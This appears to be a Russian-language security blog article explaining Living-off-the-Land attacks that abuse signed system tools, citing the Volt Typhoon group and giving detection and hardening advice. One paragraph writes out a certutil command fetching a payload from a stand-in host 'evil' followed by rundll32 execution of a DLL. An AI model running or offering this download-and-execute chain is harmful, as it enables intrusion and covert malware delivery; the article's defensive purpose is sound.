Логотип
Главная | Статьи | Living-off-the-Land: атаки без загрузки малвари
Living-off-the-Land: атаки без загрузки малвари

Living-off-the-Land: атаки без загрузки малвари

25 августа, 2026

51

Living off the Land (LOTL) – это когда атакующий не тащит в систему кастомный малварный бинарник, а работает штатными, подписанными Microsoft/вендором тулзами: PowerShell, WMI, certutil, rundll32, bitsadmin, mshta, psexec и т.д. По данным Vectra AI, такие атаки задействованы в 84% high-severity инцидентов, а PowerShell светится в 71% всех LOTL-кейсов. Логика простая: раз бинарь подписан и легитимен, EDR/антивирус его не палит как “малварь” – палит только поведение, а поведение легко замаскировать под админскую рутину.

Каталогизация давно есть под каждую платформу:

  • LOLBAS – Windows-бинари
  • GTFOBins – Unix/Linux
  • LOOBins – macOS
  • LOLDrivers – уязвимые/подписанные драйверы для BYOVD-атак

LOLBAS-проект уже задокументировал больше 200 windows-бинарей, пригодных для абьюза, и список постоянно растёт.

Топ LOLBins и как их разворачивают против системы

БинарьЛегитимная функцияКак абьюзятMITRE ID
PowerShellАдминистрирование, автоматизацияIn-memory execution, кража кредов, no-file payloadT1059.001
WMI/WMICУдалённое управление, инвентаризацияУдалённый запуск процессов, persistenceT1047
certutil.exeРабота с сертификатамиСкачивание файлов, base64-кодирование пейлоадаT1105
rundll32.exeЗапуск функций из DLLProxy-execution вредоносной DLLT1218.011
mshta.exeЗапуск HTA-приложенийИсполнение HTA с удалённого URLT1218.005
bitsadminФоновая передача файловСкрытая доставка второго стейджаT1197

Источник таблицы – разбор SentinelOne.

Классический сценарий: атакующий пишет через certutil -urlcache -split -f http://evil/payload.b64 out.txt, декодит base64 тем же certutil, а дальше через rundll32.exe payload.dll,EntryPoint запускает код прямо в памяти. Ни один файл не палится как “exe с подписью Kaspersky detected” – потому что это два родных виндовых бинаря, просто скормленных не по назначению.

Реальный кейс: Volt Typhoon

Гос-спонсируемая группа Volt Typhoon (КНР) – эталонный пример боевого применения LOTL против критической инфраструктуры США. CISA прямо пишет: группа использует hands-on-keyboard активность и нативные системные инструменты (LOLBins) для закрепления и расширения доступа в сетях жертв, полностью избегая дропа кастомного малваря. Ключевой инструмент из их арсенала – злоупотребление ntdsutil.exe для дампа базы Active Directory, а также WMI для латерального движения.

Что важно: даже “хвостовые” side-tools вроде Earthworm (туннелирование) и Mimikatz (креды) детектятся сигнатурно, а вот сама LOTL-часть цепочки – нет, потому что там просто системные вызовы. Это и есть суть метода: малварь нужна только там, где без неё реально никак, а весь основной путь – через доверенные бинари.

Как это детектить (раз уж ты на защитной стороне)

Голыми сигнатурами LOTL не ловится – нужна поведенческая аналитика. Рабочий базовый стек логов:

  • Sysmon Event ID 1 (создание процесса) + командная строка – обязательно логируй CommandLine, а не только имя процесса.
  • Windows Event ID 4688 – создание процесса на уровне ОС, полезно триангулировать с Sysmon.
  • Event ID 4103/4104 – PowerShell Script Block Logging, ловит даже обфусцированные one-liner’ы.
  • WMI-события 5857, 4656, 4663, 4658, 4662 – палит WMI-персистентность и лативное движение.
  • Event ID 1102 – очистка журнала аудита, частый сигнал зачистки следов после LOTL-цепочки.

Пример Sigma-логики (псевдокод) для детекта подозрительного certutil:

То же самое правило можно клонировать под bitsadmin, mshta, regsvr32 – паттерн один: белый бинарь + нетипичные для него флаги/аргументы.

Практические выводы для защиты

  • Включай PowerShell Constrained Language Mode – режет доступ к .NET reflection и COM, без которых половина LOTL-трюков дохнет.
  • Ставь AppLocker/WDAC правила не по хешам, а по паттернам аргументов и родительских процессов – блокируй certutil со скачиванием, mshta с внешним URL.
  • Централизуй логи и держи baseline “нормального” поведения LOLBins в конкретной сети – админ, который каждый день гоняет WMI, это не то же самое, что WMI-запуск с рабочей станции бухгалтерии в 3 ночи.
  • Мониторь родительско-дочерние цепочки процессов: Word → PowerShell → certutil – красный флаг сам по себе, вне зависимости от аргументов.